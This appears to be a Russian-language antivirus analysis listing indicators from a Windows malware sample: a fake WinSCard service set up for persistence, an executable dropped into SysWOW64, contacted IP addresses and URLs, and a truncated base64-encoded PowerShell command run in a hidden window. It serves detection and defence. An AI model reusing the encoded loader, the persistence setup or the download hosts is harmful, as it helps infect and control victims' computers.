Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\WinSCard] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\WinSCard] 'ImagePath' = '"%WINDIR%\SysWOW64\mfcm140u\WinSCard.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAEcASgBLAFgAbQB4AGUAPQAnAEQARQBWAFIAVgB4AGgAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBgAEkAdAB5AHAAcgBvAHQAbwBjAE8AbAAiACAAPQAgAC...
- %HOMEPATH%\14.exe
- %WINDIR%\syswow64\mfcm140u\winscard.exe
- %HOMEPATH%\14.exe в %WINDIR%\syswow64\mfcm140u\winscard.exe
- '47.##6.117.214':80
- http://mk#f.mx/wp-includes/nf_p0w_z87k/
- http://47.##6.117.214/MPOSgzB3i6hlbVb/DpPrJjIn9Lz/
- DNS ASK mk#f.mx
- '%HOMEPATH%\14.exe'
- '%WINDIR%\syswow64\mfcm140u\winscard.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAEcASgBLAFgAbQB4AGUAPQAnAEQARQBWAFIAVgB4AGgAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBgAEkAdAB5AHAAcgBvAHQAbwBjAE8AbAAiACAAPQAgAC...' (со скрытым окном)